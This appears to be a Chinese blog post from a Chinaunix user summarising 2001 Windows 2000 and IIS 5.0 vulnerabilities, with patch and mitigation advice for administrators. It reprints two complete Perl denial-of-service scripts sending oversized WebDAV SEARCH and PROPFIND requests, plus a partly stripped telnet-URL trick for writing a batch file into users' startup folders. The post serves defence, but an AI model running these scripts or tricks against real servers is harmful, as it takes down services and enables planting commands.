Chinaunix首页 | 论坛 | 博客
  • 博客访问: 19266356
  • 博文数量: 7460
  • 博客积分: 10434
  • 博客等级: 上将
  • 技术积分: 78178
  • 用 户 组: 普通用户
  • 注册时间: 2008-03-02 22:54
文章分类

全部博文(7460)

文章存档

2011年(1)

2009年(669)

2008年(6790)

分类: 网络与安全

2008-05-31 23:31:03

Windows2000操作系统现在已经广泛应用于企业内部网和外部网,虽然它的Bug不断,但是只要及时跟踪和了解相关漏洞及对策,并正确安装微软公司发布的安全补丁程序,是绝对可以充分利用Windows2000的强大功能的。本文将描述Win2K系统的典型漏洞及对策,系统管理员应该仔细阅读,以最大程度地确保系统之稳固。
  
  
  漏洞名称:
  
  Microsoft IIS 5.0 WebDAV搜索之拒绝服务漏洞
  
  
  发布日:
  
  2001年3月16日
  
  
  本地或远程:
  
  远程
  
  
  描 述:
  
  WebDAV即Web分布式创作和版本控制协议,它是一个基于HTTP的新协议,用户可以通过WebDAV在网络上进行与所用创作工具无关的无缝文档合作,例如通过Web进行基本的远程文件操作:复制、移动、删除等。Exchange 2000的WebDAV支持使Microsoft Office 2000文档可直接存放在Exchange中,因而简化了被复制文档的管理和团队式创作。WebDAV将XML用作数据元的传输格式。
  
  
  WebDAV 在对超长请求的处理中包含一个缺陷,当提交一个有效然而超长的WebDAV搜索请求时,有可能会重新启动IIS 服务并导致服务器停止响应。
  
  
  漏洞利用方式:
  
  这个漏洞的利用脚本是perl代码,如下:
  
  
  http://downloads.securityfocus.com/vulnerabilities/exploits/vv6.pl
  
  
  #!/usr/bin/perl
  
  use IO::Socket;
  
  printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
  
  if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
  
  $port = @ARGV[1];
  
  $host = @ARGV[0];
  
  sub vv()
  
  {
  
  $ll=$_[0]; #length of buffer
  
  $ch=$_[1];
  
  $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
  
  $over=$ch x $ll; #string to overflow
  
  $xml='SELECT DAV:displayname from
  
  SCOPE("'.$over.'")
'."\n";
  
  $l=length($xml);
  
  $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
  
  syswrite($socket,$req,length($req));
  
  print ".";
  
  $socket->read($res,3000);
  
  print "r=".$res;
  
  close $socket;
  
  }
  
  do vv(126000,"V");
  
  sleep(1);
  
  do vv(126000,"V");
  
  #Try 125000 - 128000
  
  
  对 策:
  
  Microsoft补丁程序Q291845_W2K_SP2_x86_en
  
  
  
  
  q291845/NT5/EN-US/Q291845_W2K_SP2_x86_en.EXE
  
  
  
  
  
  漏洞名称:
  
  Microsoft IE 5.01/ 5.5 Telnet客户文件覆盖漏洞
  
  
  发布日:
  
  2001年3月9日
  
  
  本地或远程:
  
  远程
  
  
  描 述:
  
  Win2K的Unix2.0服务中包含了一个客户端日志选项,用以将一个telnet会话中的所有交换信息都记录下来。这里面存在一个漏洞,使远程用户可以调用telnet 客户程序并通过IE在一个目标机器上执行任意命令。实际上,这是通过伪造一个由命令行参数组成的URL并成为telent的输入项,从而调用telnet.exe连接到主机并记录会话信息。如果攻击者能够使用这个文件的话,他就可以向其中写入任意命令,以备今后执行。
  
  
  漏洞利用方式:
  
  下面的URL 会导致IE连接到主机并开始记录功能:
  
  
  telnet:-f%20\file.txt%20host
  
  
  请看下面的一个恶意HTML代码的例子,它将主机host的目标端口上接收到的数据写入所有用户启动目录下的文件filename中。如果登录的用户有适当的权限,就会创建一个批处理文件,以备今后鉴定用户身份时执行。
  
  
  
  
  
  
  
  
  
  
  
    
  start%20menu\programs\startup\start.bat%20host%208000>
  
  
  
  
  
  
  
  
  对 策:
  
  Microsoft已经发布了纠正这一问题的补丁,地址是:
  
  
  
  
  漏洞名称:
  
  Microsoft IIS 5.0 WebDAV拒绝服务漏洞
  
  
  发布日:
  
  2001 年3月8日
  
  
  本地或远程:
  
  远程
  
  
  描 述:
  
  WebDAV在对某些畸形请求的处理中包含一个漏洞,提交多个畸形的WebDAV 请求可能会造成服务器停止响应,并有可能重新启动所有的IIS服务。
  
  
  漏洞利用方式:
  
  这个漏洞的利用脚本是perl代码,如下:
  
  
  http://www.securityfocus.com/data/vulnerabilities/exploits/vv5.pl
  
  
  #!/usr/bin/perl
  
  # Written by Georgi Guninski
  
  use IO::Socket;
  
  
  print "IIS 5.0 propfind\n";
  
  
  $port = @ARGV[1];
  
  $host = @ARGV[0];
  
  
  
  sub vv()
  
  {
  
  
  $ll=$_[0]; #length of buffer
  
  $ch=$_[1];
  
  $over=$ch x $ll; #string to overflow
  
  
  $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
  
  #$xml=''."".''."\n\n";
  
  # ^^^^ This is another issue and also works with length ~>65000
  
  
  
  $xml=''."".''."\n\n";
  
  $l=length($xml);
  
  $req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
  
  syswrite($socket,$req,length($req));
  
  print ".";
  
  $socket->read($res,300);
  
  #print "r=".$res;
  
  close $socket;
  
  }
  
  
  
  do vv(128008,"V"); # may need to change the length
  
  sleep(1);
  
  do vv(128008,"V");
  
  print "Done.\n";
  
  
  对 策:
  
  方法1:安装Microsoft补丁程序Q291845_W2K_SP2_x86_en
  
  
  
  
  q291845/NT5/EN-US/Q291845_W2K_SP2_x86_en.EXE
  
  
  方法2:禁止WebDAV功能
  
  
  默认状态下,IIS5.0能够对WebDAV请求做出响应,因此,如果没有Web创作和发布的需求,最好最简单的方法就是禁止WebDAV。IIS5.0的 WebDAV功能是通过Httpext.dll文件实现的,不能通过重命名方式执行禁止,因为Win2K的Windows文件保护(WFP)功能会阻止对某些系统文件尽显修改或删除。正确禁止WebDAV功能的步骤是:
  
  
  1、切换到命令行状态
  
  2、执行“IISRESET /STOP”,停止IIS服务
  
  3、转换到目录“%SystemRoot%\System32\Inetsrv”,执行“CACLS httpext.dll /D Everyone”,设置Httpext.dll文件的ACL,使任何人都不能访问它
  
  4、执行“IISRESET /START”,重新启动IIS服务
  
  
  
  
  
  漏洞名称:
  
  Microsoft IIS 多个无效URL请求拒绝服务漏洞
  
  
  发布日:
  
  2001 年3月1日
  
  
  本地或远程:
  
  本地、远程
  
  
  描 述:
  
  向一个正在运行Microsoft IIS 的主机多次发出一个特别伪造的URL请求,就会导致IIS 服务停止响应。恢复正常功能只能重新启动服务。
  
  
  漏洞利用方式:
  
  目前还没有对它的利用
  
  
  对 策:
  
  Microsoft补丁程序Q286818_W2K_SP3_x86_en
  
  
  
  
  q286818/NT5/EN-US/Q286818_W2K_SP3_x86_en.EXE
阅读(868) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~